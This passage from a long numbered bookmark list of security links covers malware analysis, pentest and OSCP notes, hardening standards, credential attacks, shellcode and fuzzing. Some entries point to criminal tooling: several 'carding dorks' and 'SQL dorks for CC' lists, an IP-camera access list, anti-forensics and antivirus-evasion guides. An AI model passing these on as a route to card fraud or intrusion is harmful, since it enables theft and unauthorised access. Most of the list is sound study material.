https://malwology.com/2018/11/30/intro-to-radare2-for-malware-analysis/ -1199-Intro to Malware Analysis and Reverse Engineering: https://www.cybrary.it/course/malware-analysis/ -1200-Common Malware Persistence Mechanisms: https://resources.infosecinstitute.com/common-malware-persistence-mechanisms/ -1201-Finding Registry Malware Persistence with RECmd: https://digital-forensics.sans.org/blog/2019/05/07/malware-persistence-recmd -1202-Windows Malware Persistence Mechanisms : https://www.swordshield.com/blog/windows-malware-persistence-mechanisms/ -1203- persistence techniques: https://www.andreafortuna.org/2017/07/06/malware-persistence-techniques/ -1204- Persistence Mechanism - an overview | ScienceDirect Topics: https://www.sciencedirect.com/topics/computer-science/persistence-mechanism -1205-Malware analysis for Linux: https://www.sothis.tech/en/malware-analysis-for-linux-wirenet/ -1206-Linux Malware Persistence with Cron: https://www.sandflysecurity.com/blog/linux-malware-persistence-with-cron/ -1207-What is advanced persistent threat (APT)? : https://searchsecurity.techtarget.com/definition/advanced-persistent-threat-APT -1208-Malware Analysis, Part 1: Understanding Code Obfuscation : https://www.vadesecure.com/en/malware-analysis-understanding-code-obfuscation-techniques/ -1209-Top 6 Advanced Obfuscation Techniques: https://sensorstechforum.com/advanced-obfuscation-techniques-malware/ -1210-Malware Obfuscation Techniques: https://dl.acm.org/citation.cfm?id=1908903 -1211-How Hackers Hide Their Malware: Advanced Obfuscation: https://www.darkreading.com/attacks-breaches/how-hackers-hide-their-malware-advanced-obfuscation/a/d-id/1329723 -1212-Malware obfuscation techniques: four simple examples: https://www.andreafortuna.org/2016/10/13/malware-obfuscation-techniques-four-simple-examples/ -1213-Malware Monday: Obfuscation: https://medium.com/@bromiley/malware-monday-obfuscation-f65239146db0 -1213-Challenge of Malware Analysis: Malware obfuscation Techniques: https://www.ijiss.org/ijiss/index.php/ijiss/article/view/327 -1214-Static Malware Analysis - Infosec Resources: https://resources.infosecinstitute.com/malware-analysis-basics-static-analysis/ -1215-Malware Basic Static Analysis: https://medium.com/@jain.sm/malware-basic-static-analysis-cf19b4600725 -1216-Difference Between Static Malware Analysis and Dynamic Malware Analysis: http://www.differencebetween.net/technology/difference-between-static-malware-analysis-and-dynamic-malware-analysis/ -1217-What is Malware Analysis | Different Tools for Malware Analysis: https://blog.comodo.com/different-techniques-for-malware-analysis/ -1218-Detecting Malware Pre-execution with Static Analysis and Machine Learning: https://www.sentinelone.com/blog/detecting-malware-pre-execution-static-analysis-machine-learning/ -1219-Limits of Static Analysis for Malware Detection: https://ieeexplore.ieee.org/document/4413008 -1220-Kernel mode versus user mode: https://blog.codinghorror.com/understanding-user-and-kernel-mode/ -1221-Understanding the ELF: https://medium.com/@MrJamesFisher/understanding-the-elf-4bd60daac571 -1222-Windows Privilege Abuse: Auditing, Detection, and Defense: https://medium.com/palantir/windows-privilege-abuse-auditing-detection-and-defense-3078a403d74e -1223-First steps to volatile memory analysis: https://medium.com/@zemelusa/first-steps-to-volatile-memory-analysis-dcbd4d2d56a1 -1224-Maliciously Mobile: A Brief History of Mobile Malware: https://medium.com/threat-intel/mobile-malware-infosec-history-70f3fcaa61c8 -1225-Modern Binary Exploitation Writeups 0x01: https://medium.com/bugbountywriteup/binary-exploitation-5fe810db3ed4 -1226-Exploit Development 01 — Terminology: https://medium.com/@MKahsari/exploit-development-01-terminology-db8c19db80d5 -1227-Zero-day exploits: A cheat sheet for professionals: https://www.techrepublic.com/article/zero-day-exploits-the-smart-persons-guide/ -1228-Best google hacking list on the net: https://pastebin.com/x5LVJu9T -1229-Google Hacking: https://pastebin.com/6nsVK5Xi -1230-OSCP links: https://pastebin.com/AiYV80uQ -1231-Pentesting 1 Information gathering: https://pastebin.com/qLitw9eT -1232-OSCP-Survival-Guide: https://pastebin.com/kdc6th08 -1233-Googledork: https://pastebin.com/qKwU37BK -1234-Exploit DB: https://pastebin.com/De4DNNKK -1235-Dorks: https://pastebin.com/cfVcqknA -1236-GOOGLE HACKİNG DATABASE: https://pastebin.com/1ndqG7aq -1237-Carding Dorks 2019: https://pastebin.com/Hqsxu6Nn -1238-17k Carding Dorks 2019: https://pastebin.com/fgdZxy74 -1239-CARDING DORKS 2019: https://pastebin.com/Y7KvzZqg -1240-sqli dork 2019: https://pastebin.com/8gdeLYvU -1241-Private Carding Dorks 2018: https://pastebin.com/F0KxkMMD -1242-20K dorks list fresh full carding 2018: https://pastebin.com/LgCh0NRJ -1243-8k Carding Dorks :): https://pastebin.com/2bjBPiEm -1244-8500 SQL DORKS: https://pastebin.com/yeREBFzp -1245-REAL CARDING DORKS: https://pastebin.com/0kMhA0Gb -1246-15k btc dorks: https://pastebin.com/zbbBXSfG -1247-Sqli dorks 2016-2017: https://pastebin.com/7TQiMj3A -1248-Here is kind of a tutorial on how to write google dorks.: https://pastebin.com/hZCXrAFK -1249-10k Private Fortnite Dorks: https://pastebin.com/SF9UmG1Y -1250-find login panel dorks: https://pastebin.com/9FGUPqZc -1251-Shell dorks: https://pastebin.com/iZBFQ5yp -1252-HQ PAID GAMING DORKS: https://pastebin.com/vNYnyW09 -1253-10K HQ Shopping DORKS: https://pastebin.com/HTP6rAt4 -1254-Exploit Dorks for Joomla,FCK and others 2015 Old but gold: https://pastebin.com/ttxAJbdW -1255-Gain access to unsecured IP cameras with these Google dorks: https://pastebin.com/93aPbwwE -1256-new fresh dorks: https://pastebin.com/ZjdxBbNB -1257-SQL DORKS FOR CC: https://pastebin.com/ZQTHwk2S -1258-Wordpress uploadify Dorks Priv8: https://pastebin.com/XAGmHVUr -1259-650 DORKS CC: https://pastebin.com/xZHARTyz -1260-3k Dorks Shopping: https://pastebin.com/e1XiNa8M -1261-DORKS 2018 : https://pastebin.com/YAZkPJ0j -1262-HQ FORTNITE DORKS LIST: https://pastebin.com/rzhiNad8 -1263-HQ PAID DORKS MIXED GAMING LOL STEAM ..MUSIC SHOPING: https://pastebin.com/VwVpAvj2 -1264-Camera dorks: https://pastebin.com/fsARft2j -1265-Admin Login Dorks: https://pastebin.com/HWWNZCph -1266-sql gov dorks: https://pastebin.com/C8wqyNW8 -1267-10k hq gaming dorks: https://pastebin.com/cDLN8edi -1268-HQ SQLI Google Dorks For Shops/Amazon! Enjoy! : https://pastebin.com/y59kK2h0 -1269-Dorks: https://pastebin.com/PKvZYMAa -1270-10k btc dorks: https://pastebin.com/vRnxvbCu -1271-7,000 Dorks for hacking into various sites: https://pastebin.com/n8JVQv3X -1272-List of information gathering search engines/tools etc: https://pastebin.com/GTX9X5tF -1273-FBOSINT: https://pastebin.com/5KqnFS0B -1274-Ultimate Penetration Testing: https://pastebin.com/4EEeEnXe -1275-massive list of information gathering search engines/tools : https://pastebin.com/GZ9TVxzh -1276-CEH Class: https://pastebin.com/JZdCHrN4 -1277-CEH/CHFI Bundle Study Group Sessions: https://pastebin.com/XTwksPK7 -1278-OSINT - Financial: https://pastebin.com/LtxkUi0Y -1279-Most Important Security Tools and Resources: https://pastebin.com/cGE8rG04 -1280-OSINT resources from inteltechniques.com: https://pastebin.com/Zbdz7wit -1281-Red Team Tips: https://pastebin.com/AZDBAr1m -1282-OSCP Notes by Ash: https://pastebin.com/wFWx3a7U -1283-OSCP Prep: https://pastebin.com/98JG5f2v -1284-OSCP Review/Cheat Sheet: https://pastebin.com/JMMM7t4f -1285-OSCP Prep class: https://pastebin.com/s59GPJrr -1286-Complete Anti-Forensics Guide: https://pastebin.com/6V6wZK0i -1287-The Linux Command Line Cheat Sheet: https://pastebin.com/PUtWDKX5 -1288-Command-Line Log Analysis: https://pastebin.com/WEDwpcz9 -1289-An A-Z Index of the Apple macOS command line (OS X): https://pastebin.com/RmPLQA5f -1290-San Diego Exploit Development 2018: https://pastebin.com/VfwhT8Yd -1291-Windows Exploit Development Megaprimer: https://pastebin.com/DvdEW4Az -1292-Some Free Reverse engineering resources: https://pastebin.com/si2ThQPP -1293-Sans: https://pastebin.com/MKiSnjLm -1294-Metasploit Next Level: https://pastebin.com/0jC1BUiv -1295-Just playing around....: https://pastebin.com/gHXPzf6B -1296-Red Team Course: https://pastebin.com/YUYSXNpG -1297-New Exploit Development 2018: https://pastebin.com/xaRxgYqQ -1298-Good reviews of CTP/OSCE (in no particular order):: https://pastebin.com/RSPbatip -1299-Vulnerability Research Engineering Bookmarks Collection v1.0: https://pastebin.com/8mUhjGSU -1300-Professional-hacker's Pastebin : https://pastebin.com/u/Professional-hacker -1301-Google Cheat Sheet: http://www.googleguide.com/print/adv_op_ref.pdf -1302-Shodan for penetration testers: https://www.defcon.org/images/defcon-18/dc-18-presentations/Schearer/DEFCON-18-Schearer-SHODAN.pdf -1303-Linux networking tools: https://gist.github.com/miglen/70765e663c48ae0544da08c07006791f -1304-DNS spoofing with NetHunter: https://cyberarms.wordpress.com/category/nethunter-tutorial/ -1305-Tips on writing a penetration testing report: https://www.sans.org/reading-room/whitepapers/bestprac/writing-penetration-testing-report-33343 -1306-Technical penetration report sample: https://tbgsecurity.com/wordpress/wp-content/uploads/2016/11/Sample-Penetration-Test-Report.pdf -1307-Nessus sample reports: https://www.tenable.com/products/nessus/sample-reports -1308-Sample penetration testing report: https://www.offensive-security.com/reports/sample-penetration-testing-report.pdf -1309-jonh-the-ripper-cheat-sheet: https://countuponsecurity.com/2015/06/14/jonh-the-ripper-cheat-sheet/ -1310-ultimate guide to cracking foreign character passwords using hashcat: http://www.netmux.com/blog/ultimate-guide-to-cracking-foreign-character-passwords-using-has -1311-Building_a_Password_Cracking_Rig_for_Hashcat_-_Part_III: https://www.unix-ninja.com/p/Building_a_Password_Cracking_Rig_for_Hashcat_-_Part_III -1312-cracking story how i cracked over 122 million sha1 and md5 hashed passwords: http://blog.thireus.com/cracking-story-how-i-cracked-over-122-million-sha1-and-md5-hashed-passwords/ -1313-CSA (Cloud Security Alliance) Security White Papers: https://cloudsecurityalliance.org/download/ -1314-NIST Security Considerations in the System Development Life Cycle: https://nvlpubs.nist.gov/nistpubs/legacy/sp/nistspecialpublication800-64r2.pdf -1315-ISO 29100 information technology security techniques privacy framework: https://www.iso.org/standard/45123.html -1316-NIST National Checklist Program: https://nvd.nist.gov/ncp/repository -1317-OWASP Guide to Cryptography: https://www.owasp.org/index.php/Guide_to_Cryptography -1318-NVD (National Vulnerability Database): https://nvd.nist.gov/ -1319-CVE details: https://cvedetails.com/ -1320-CIS Cybersecurity Tools: https://www.cisecurity.org/cybersecurity-tools/ -1321-Security aspects of virtualization by ENISA: https://www.enisa.europa.eu/publications/security-aspects-of-virtualization/ -1322-CIS Benchmarks also provides a security guide for VMware, Docker, and Kubernetes: https://www.cisecurity.org/cis-benchmarks/ -1323-OpenStack's hardening of the virtualization layer provides a secure guide to building the virtualization layer: https://docs.openstack.org/security-guide/compute/hardening-the-virtualization-layers.html -1324-Docker security: https://docs.docker.com/engine/security/security/ -1325-Microsoft Security Development Lifecycle: http://www.microsoft.com/en-us/SDL/ -1326-OWASP SAMM Project: https://www.owasp.org/index.php/OWASP_SAMM_Project -1327-CWE/SANS Top 25 Most Dangerous Software Errors: https://cwe.mitre.org/top25/ -1329-OWASP Vulnerable Web Applications Directory Project: https://www.owasp.org/index.php/OWASP_Vulnerable_Web_Applications_Directory_Project -1330-CERT Secure Coding Standards: https://wiki.sei.cmu.edu/confluence/display/seccode/SEI+CERT+Coding+Standards -1331-NIST Special Publication 800-53: https://nvd.nist.gov/800-53 -1332-SAFECode Security White Papers: https://safecode.org/publications/ -1333-Microsoft Threat Modeling tool 2016: https://aka.ms/tmt2016/ -1334-Apache Metron for real-time big data security: http://metron.apache.org/documentation/ -1335-Introducing OCTAVE Allegro: Improving the Information Security Risk Assessment Process: https://resources.sei.cmu.edu/asset_files/TechnicalReport/2007_005_001_14885.pdf -1336-NIST 800-18 Guide for Developing Security Plans for Federal Information Systems: http://nvlpubs.nist.gov/nistpubs/legacy/sp/nistspecialpublication800-18r1.pdf -1337-ITU-T X.805 (10/2003) Security architecture for systems providing end- to-end communications: https://www.itu.int/rec/dologin_pub.asp?lang=e&id=T-REC-X.805-200310-I!!PDF-E&type=items -1338-ETSI TS 102 165-1 V4.2.1 (2006-12) : Method and proforma for Threat, Risk, Vulnerability Analysis: http://www.etsi.org/deliver/etsi_ts/102100_102199/10216501/04.02.01_60/ts_10216501v040201p.pdf -1339-SAFECode Fundamental Practices for Secure Software Development: https://safecode.org/wp-content/uploads/2018/03/SAFECode_Fundamental_Practices_for_Secure_Software_Development_March_2018.pdf -1340-NIST 800-64 Security Considerations in the System Development Life Cycle: https://csrc.nist.gov/publications/detail/sp/800-64/rev-2/final -1341-SANS A Security Checklist for Web Application Design: https://www.sans.org/reading-room/whitepapers/securecode/security-checklist-web-application-design-1389 -1342-Best Practices for implementing a Security Awareness Program: https://www.pcisecuritystandards.org/documents/PCI_DSS_V1.0_Best_Practices_for_Implementing_Security_Awareness_Program.pdf -1343-ETSI TS 102 165-1 V4.2.1 (2006-12): Method and proforma for Threat, Risk, Vulnerability Analysis: http://www.etsi.org/deliver/etsi_ts/102100_102199/10216501/04.02.03_60/ts_10216501v040203p.pdf -1344-NIST 800-18 Guide for Developing Security Plans for Federal Information Systems: https://csrc.nist.gov/publications/detail/sp/800-18/rev-1/final -1345-SafeCode Tactical Threat Modeling: https://safecode.org/safecodepublications/tactical-threat-modeling/ -1346-SANS Web Application Security Design Checklist: https://www.sans.org/reading-room/whitepapers/securecode/security-checklist-web-application-design-1389 -1347-Data Anonymization for production data dumps: https://github.com/sunitparekh/data-anonymization -1348-SANS Continuous Monitoring—What It Is, Why It Is Needed, and How to Use It: https://www.sans.org/reading-room/whitepapers/analyst/continuous-monitoring-is-needed-35030 -1349-Guide to Computer Security Log Management: https://ws680.nist.gov/publication/get_pdf.cfm?pub_id=50881 -1350-Malware Indicators: https://github.com/citizenlab/malware-indicators -1351-OSINT Threat Feeds: https://www.circl.lu/doc/misp/feed-osint/ -1352-SANS How to Use Threat Intelligence effectively: https://www.sans.org/reading-room/whitepapers/analyst/threat-intelligence-is-effectively-37282 -1353-NIST 800-150 Guide to Cyber Threat Information Sharing: https://nvlpubs.nist.gov/nistpubs/specialpublications/nist.sp.800-150.pdf -1354-Securing Web Application Technologies Checklist: https://software-security.sans.org/resources/swat -1355-Firmware Security Training: https://github.com/advanced-threat-research/firmware-security-training -1356-Burp Suite Bootcamp: https://pastebin.com/5sG7Rpg5 -1357-Web app hacking: https://pastebin.com/ANsw7WRx -1358-XSS Payload: https://pastebin.com/EdxzE4P1 -1359-XSS Filter Evasion Cheat Sheet: https://pastebin.com/bUutGfSy -1360-Persistence using RunOnceEx – Hidden from Autoruns.exe: https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/ -1361-Windows Operating System Archaeology: https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology -1362-How to Backdoor Windows 10 Using an Android Phone & USB Rubber Ducky: https://www.prodefence.org/how-to-backdoor-windows-10-using-an-android-phone-usb-rubber-ducky/ -1363-Malware Analysis using Osquery : https://hackernoon.com/malware-analysis-using-osquery-part-2-69f08ec2ecec -1364-Tales of a Blue Teamer: Detecting Powershell Empire shenanigans with Sysinternals : https://holdmybeersecurity.com/2019/02/27/sysinternals-for-windows-incident-response/ -1365-Userland registry hijacking: https://3gstudent.github.io/Userland-registry-hijacking/ -1366-Malware Hiding Techniques to Watch for: AlienVault Labs: https://www.alienvault.com/blogs/labs-research/malware-hiding-techniques-to-watch-for-alienvault-labs -1367- Full text of "Google hacking for penetration testers" : https://archive.org/stream/pdfy-TPtNL6_ERVnbod0r/Google+Hacking+-+For+Penetration+Tester_djvu.txt -1368- Full text of "Long, Johnny Google Hacking For Penetration Testers" : https://archive.org/stream/LongJohnnyGoogleHackingForPenetrationTesters/Long%2C%20Johnny%20-%20Google%20Hacking%20for%20Penetration%20Testers_djvu.txt -1369- Full text of "Coding For Penetration Testers" : https://archive.org/stream/CodingForPenetrationTesters/Coding%20for%20Penetration%20Testers_djvu.txt -1370- Full text of "Hacking For Dummies" : https://archive.org/stream/HackingForDummies/Hacking%20For%20Dummies_djvu.txt -1371-Full text of "Wiley. Hacking. 5th. Edition. Jan. 2016. ISBN. 1119154685. Profescience.blogspot.com" : https://archive.org/stream/Wiley.Hacking.5th.Edition.Jan.2016.ISBN.1119154685.Profescience.blogspot.com/Wiley.Hacking.5th.Edition.Jan.2016.ISBN.1119154685.Profescience.blogspot.com_djvu.txt -1372- Full text of "Social Engineering The Art Of Human Hacking" : https://archive.org/stream/SocialEngineeringTheArtOfHumanHacking/Social%20Engineering%20-%20The%20Art%20of%20Human%20Hacking_djvu.txt -1373- Full text of "CYBER WARFARE" : https://archive.org/stream/CYBERWARFARE/CYBER%20WARFARE_djvu.txt -1374-Full text of "NSA DOCID: 4046925 Untangling The Web: A Guide To Internet Research" : https://archive.org/stream/Untangling_the_Web/Untangling_the_Web_djvu.txt -1375- Full text of "sectools" : https://archive.org/stream/sectools/hack-the-stack-network-security_djvu.txt -1376- Full text of "Aggressive network self-defense" : https://archive.org/stream/pdfy-YNtvDJueGZb1DCDA/Aggressive%20Network%20Self-Defense_djvu.txt -1377-Community Texts: https://archive.org/details/opensource?and%5B%5D=%28language%3Aeng+OR+language%3A%22English%22%29+AND+subject%3A%22google%22 -1378- Full text of "Cyber Spying - Tracking (sometimes).PDF (PDFy mirror)" : https://archive.org/stream/pdfy-5-Ln_yPZ22ondBJ8/Cyber%20Spying%20-%20Tracking%20%28sometimes%29_djvu.txt -1379- Full text of "Enzyclopedia Of Cybercrime" : https://archive.org/stream/EnzyclopediaOfCybercrime/Enzyclopedia%20Of%20Cybercrime_djvu.txt -1380- Full text of "Information Security Management Handbook" : https://archive.org/stream/InformationSecurityManagementHandbook/Information%20Security%20Management%20Handbook_djvu.txt -1381- Full text of "ARMArchitecture Reference Manual" : https://archive.org/stream/ARMArchitectureReferenceManual/DetectionOfIntrusionsAndMalwareAndVulnerabilityAssessment2016_djvu.txt -1382- Full text of "Metasploit The Penetration Tester S Guide" : https://archive.org/stream/MetasploitThePenetrationTesterSGuide/Metasploit-The+Penetration+Tester+s+Guide_djvu.txt -1383-Tips & tricks to master Google’s search engine: https://medium.com/infosec-adventures/google-hacking-39599373be7d -1384-Ethical Google Hacking - Sensitive Doc Dork (Part 2) : https://securing-the-stack.teachable.com/courses/ethical-google-hacking-1/lectures/3877866 -1385- Google Hacking Secrets:the Hidden Codes of Google : https://www.ma-no.org/en/security/google-hacking-secrets-the-hidden-codes-of-google -1386-google hacking: https://www.slideshare.net/SamNizam/3-google-hacking -1387-How Penetration Testers Use Google Hacking: https://www.cqure.nl/kennisplatform/how-penetration-testers-use-google-hacking -1388-Free Automated Malware Analysis Sandboxes and Services: https://zeltser.com/automated-malware-analysis/ -1389-How to get started with Malware Analysis and Reverse Engineering: https://0ffset.net/miscellaneous/how-to-get-started-with-malware-analysis/ -1390-Handy Tools And Websites For Malware Analysis: https://www.informationsecuritybuzz.com/articles/handy-tools-and-websites/ -1391-Dynamic Malware Analysis: https://prasannamundas.com/share/dynamic-malware-analysis/ -1392-Intro to Radare2 for Malware Analysis: https://malwology.com/2018/11/30/intro-to-radare2-for-malware-analysis/ -1393-Detecting malware through static and dynamic techniques: https://technical.nttsecurity.com/.../detecting-malware-through-static-and-dynamic-tec... -1394-Malware Analysis Tutorial : Tricks for Confusing Static Analysis Tools: https://www.prodefence.org/malware-analysis-tutorial-tricks-confusing-static-analysis-tools -1395-Malware Analysis Lab At Home In 5 Steps: https://ethicalhackingguru.com/malware-analysis-lab-at-home-in-5-steps/ -1396-Malware Forensics Guide - Static and Dynamic Approach: https://www.yeahhub.com/malware-forensics-guide-static-dynamic-approach/ -1397-Top 30 Bug Bounty Programs in 2019: https://www.guru99.com/bug-bounty-programs.html -1398-Introduction - Book of BugBounty Tips: https://gowsundar.gitbook.io/book-of-bugbounty-tips/ -1399-List of bug bounty writeups: https://pentester.land/list-of-bug-bounty-writeups.html -1400-Tips From A Bugbounty Hunter: https://www.secjuice.com/bugbounty-hunter/ -1401-Cross Site Scripting (XSS) - Book of BugBounty Tips: https://gowsundar.gitbook.io/book-of-bugbounty-tips/cross-site-scripting-xss -1402-BugBountyTips: https://null0xp.wordpress.com/tag/bugbountytips/ -1403-Xss Filter Bypass Payloads: www.oroazteca.net/mq67/xss-filter-bypass-payloads.html -1404-Bug Bounty Methodology: https://eforensicsmag.com/bug-bounty-methodology-ttp-tacticstechniques-and-procedures-v-2-0 -1405-GDB cheat-sheet for exploit development: www.mannulinux.org/2017/01/gdb-cheat-sheet-for-exploit-development.html -1406-A Study in Exploit Development - Part 1: Setup and Proof of Concept : https://www.anitian.com/a-study-in-exploit-development-part-1-setup-and-proof-of-concept -1407-Exploit development tutorial : https://www.computerweekly.com/tutorial/Exploit-development-tutorial-Part-Deux -1408-exploit code development: http://www.phreedom.org/presentations/exploit-code-development/exploit-code-development.pdf -1409-“Help Defeat Denial of Service Attacks: Step-by-Step”: http://www.sans.org/dosstep/ -1410-Internet Firewalls: Frequently Asked Questions: http://www.interhack.net/pubs/fwfaq/ -1411-Service Name and Transport Protocol Port Number: http://www.iana.org/assignments/port-numbers -1412-10 Useful Open Source Security Firewalls for Linux Systems: https://www.tecmint.com/open-source-security-firewalls-for-linux-systems/ -1413-40 Linux Server Hardening Security Tips: https://www.cyberciti.biz/tips/linux-security.html -1414-Linux hardening: A 15-step checklist for a secure Linux server : https://www.computerworld.com/.../linux-hardening-a-15-step-checklist-for-a-secure-linux-server -1415-25 Hardening Security Tips for Linux Servers: https://www.tecmint.com/linux-server-hardening-security-tips/ -1416-How to Harden Unix/Linux Systems & Close Security Gaps: https://www.beyondtrust.com/blog/entry/harden-unix-linux-systems-close-security-gaps -1417-34 Linux Server Security Tips & Checklists for Sysadmins: https://www.process.st/server-security/ -1418-Linux Hardening: https://www.slideshare.net/MichaelBoelen/linux-hardening -1419-23 Hardening Tips to Secure your Linux Server: https://www.rootusers.com/23-hardening-tips-to-secure-your-linux-server/ -1420-What is the Windows Registry? : https://www.computerhope.com/jargon/r/registry.htm -1421-Windows Registry, Everything You Need To Know: https://www.gammadyne.com/registry.htm -1422-Windows Registry Tutorial: https://www.akadia.com/services/windows_registry_tutorial.html -1423-5 Tools to Scan a Linux Server for Malware and Rootkits: https://www.tecmint.com/scan-linux-for-malware-and-rootkits/ -1424-Subdomain takeover dew to missconfigured project settings for Custom domain .: https://medium.com/bugbountywriteup/subdomain-takeover-dew-to-missconfigured-project-settings-for-custom-domain-46e90e702969 -1425-Massive Subdomains p0wned: https://medium.com/bugbountywriteup/massive-subdomains-p0wned-80374648336e -1426-Subdomain Takeover: Basics: https://0xpatrik.com/subdomain-takeover-basics/ -1427-Subdomain Takeover: Finding Candidates: https://0xpatrik.com/subdomain-takeover-candidates/ -1428-Bugcrowd's Domain & Subdomain Takeover!: https://bugbountypoc.com/bugcrowds-domain-takeover/ -1429-What Are Subdomain Takeovers, How to Test and Avoid Them?: https://dzone.com/articles/what-are-subdomain-takeovers-how-to-test-and-avoid -1430-Finding Candidates for Subdomain Takeovers: https://jarv.is/notes/finding-candidates-subdomain-takeovers/ -1431-Subdomain takeover of blog.snapchat.com: https://hackernoon.com/subdomain-takeover-of-blog-snapchat-com-60860de02fe7 -1432-Hostile Subdomain takeove: https://labs.detectify.com/tag/hostile-subdomain-takeover/ -1433-Microsoft Account Takeover Vulnerability Affecting 400 Million Users: https://www.safetydetective.com/blog/microsoft-outlook/ -1434-What is Subdomain Hijack/Takeover Vulnerability? How to Identify? & Exploit It?: https://blog.securitybreached.org/2017/10/11/what-is-subdomain-takeover-vulnerability/ -1435-Subdomain takeover detection with AQUATONE: https://michenriksen.com/blog/subdomain-takeover-detection-with-aquatone/ -1436-A hostile subdomain takeover! – Breaking application security: https://evilenigma.blog/2019/03/12/a-hostile-subdomain-takeover/ -1437-Web Development Reading List: https://www.smashingmagazine.com/2017/03/web-development-reading-list-172/ -1438-CSRF Attack can lead to Stored XSS: https://medium.com/bugbountywriteup/csrf-attack-can-lead-to-stored-xss-f40ba91f1e4f -1439-What is Mimikatz: The Beginner's Guide | Varonis: https://www.varonis.com/bog/what-is-mimikatz -1440-Preventing Mimikatz Attacks : https://medium.com/blue-team/preventing-mimikatz-attacks-ed283e7ebdd5 -1441-Mimikatz tutorial: How it hacks Windows passwords, credentials: https://searchsecurity.techtarget.com/.../Mimikatz-tutorial-How-it-hacks-Windows-passwords-credentials -1442-Mimikatz: Walkthrough [Updated 2019]: https://resources.infosecinstitute.com/mimikatz-walkthrough/ -1443-Mimikatz -Windows Tutorial for Beginner: https://hacknpentest.com/mimikatz-windows-tutorial-beginners-guide-part-1/ -1444-Mitigations against Mimikatz Style Attacks: https://isc.sans.edu/forums/diary/Mitigations+against+Mimikatz+Style+Attacks -1445-Exploring Mimikatz - Part 1 : https://blog.xpnsec.com/exploring-mimikatz-part-1/ -1446-Powershell AV Evasion. Running Mimikatz with PowerLine: https://jlajara.gitlab.io/posts/2019/01/27/Mimikatz-AV-Evasion.html -1447-How to Steal Windows Credentials with Mimikatz and Metasploit: https://www.hackingloops.com/mimikatz/ -1448-Retrieving NTLM Hashes without touching LSASS: https://www.andreafortuna.org/2018/03/26/retrieving-ntlm-hashes-without-touching-lsass-the-internal-monologue-attack/ -1449-From Responder to NT Authority\SYSTEM: https://medium.com/bugbountywriteup/from-responder-to-nt-authority-system-39abd3593319 -1450-Getting Creds via NTLMv2: https://0xdf.gitlab.io/2019/01/13/getting-net-ntlm-hases-from-windows.html -1451-Living off the land: stealing NetNTLM hashes: https://www.securify.nl/blog/SFY20180501/living-off-the-land_-stealing-netntlm-hashes.html -1452-(How To) Using Responder to capture passwords on a Windows: www.securityflux.com/?p=303 -1453-Pwning with Responder - A Pentester's Guide: https://www.notsosecure.com/pwning-with-responder-a-pentesters-guide/ -1454-LLMNR and NBT-NS Poisoning Using Responder: https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/ -1455-Responder - Ultimate Guide : https://www.ivoidwarranties.tech/posts/pentesting-tuts/responder/guide/ -1456-Responder - CheatSheet: https://www.ivoidwarranties.tech/posts/pentesting-tuts/responder/cheatsheet/ -1457-LM, NTLM, Net-NTLMv2, oh my! : https://medium.com/@petergombos/lm-ntlm-net-ntlmv2-oh-my-a9b235c58ed4 -1458-SMB Relay Attack Tutorial: https://intrinium.com/smb-relay-attack-tutorial -1459-Cracking NTLMv2 responses captured using responder: https://zone13.io/post/cracking-ntlmv2-responses-captured-using-responder/ -1460-Skip Cracking Responder Hashes and Relay Them: https://threat.tevora.com/quick-tip-skip-cracking-responder-hashes-and-replay-them/ -1461-Metasploit's First Antivirus Evasion Modules: https://blog.rapid7.com/2018/10/09/introducing-metasploits-first-evasion-module/ -1462-Evading Anti-virus Part 1: Infecting EXEs with Shellter: https://www.hackingloops.com/evading-anti-virus-shellter/ -1463-Evading AV with Shellter: https://www.securityartwork.es/2018/11/02/evading-av-with-shellter-i-also-have-sysmon-and-wazuh-i/ -1464-Shellter-A Shellcode Injecting Tool : https://www.hackingarticles.in/shellter-a-shellcode-injecting-tool/ -1465-Bypassing antivirus programs using SHELLTER: https://myhackstuff.com/shellter-bypassing-antivirus-programs/ -1466-John the Ripper step-by-step tutorials for end-users : openwall.info/wiki/john/tutorials -1467-Beginners Guide for John the Ripper (Part 1): https://www.hackingarticles.in/beginner-guide-john-the-ripper-part-1/ -1468-John the Ripper Basics Tutorial: https://ultimatepeter.com/john-the-ripper-basics-tutorial/ -1469-Crack Windows password with john the ripper: https://www.securitynewspaper.com/2018/11/27/crack-windows-password-with-john-the-ripper/ -1470-Getting Started Cracking Password Hashes with John the Ripper : https://www.tunnelsup.com/getting-started-cracking-password-hashes/ -1471-Shell code exploit with Buffer overflow: https://medium.com/@jain.sm/shell-code-exploit-with-buffer-overflow-8d78cc11f89b -1472-Shellcoding for Linux and Windows Tutorial : www.vividmachines.com/shellcode/shellcode.html -1473-Buffer Overflow Practical Examples : https://0xrick.github.io/binary-exploitation/bof5/ -1474-Msfvenom shellcode analysis: https://snowscan.io/msfvenom-shellcode-analysis/ -1475-Process Continuation Shellcode: https://azeria-labs.com/process-continuation-shellcode/ -1476-Dynamic Shellcode Execution: https://www.countercept.com/blog/dynamic-shellcode-execution/ -1477-Tutorials: Writing shellcode to binary files: https://www.fuzzysecurity.com/tutorials/7.html -1478-Creating Shellcode for an Egg Hunter : https://securitychops.com/2018/05/26/slae-assignment-3-egghunter-shellcode.html -1479-How to: Shellcode to reverse bind a shell with netcat : www.hackerfall.com/story/shellcode-to-reverse-bind-a-shell-with-netcat -1480-Bashing the Bash — Replacing Shell Scripts with Python: https://medium.com/capital-one-tech/bashing-the-bash-replacing-shell-scripts-with-python-d8d201bc0989 -1481-How to See All Devices on Your Network With nmap on Linux: https://www.howtogeek.com/.../how-to-see-all-devices-on-your-network-with-nmap-on-linux -1482-A Complete Guide to Nmap: https://www.edureka.co/blog/nmap-tutorial/ -1483-Nmap from Beginner to Advanced : https://resources.infosecinstitute.com/nmap/ -1484-Using Wireshark: Identifying Hosts and Users: https://unit42.paloaltonetworks.com/using-wireshark-identifying-hosts-and-users/ -1485-tshark tutorial and filter examples: https://hackertarget.com/tshark-tutorial-and-filter-examples/ -1486-Fuzz Testing(Fuzzing) Tutorial: What is, Types, Tools & Example: https://www.guru99.com/fuzz-testing.html -1487-Tutorial: Dumb Fuzzing - Peach Community Edition: community.peachfuzzer.com/v3/TutorialDumbFuzzing.html -1488-HowTo: ExploitDev Fuzzing: https://hansesecure.de/2018/03/howto-exploitdev-fuzzing/ -1489-Fuzzing with Metasploit: https://www.corelan.be/?s=fuzzing -1490-Fuzzing – how to find bugs automagically using AFL: 9livesdata.com/fuzzing-how-to-find-bugs-automagically-using-afl/ -1491-Introduction to File Format Fuzzing & Exploitation: 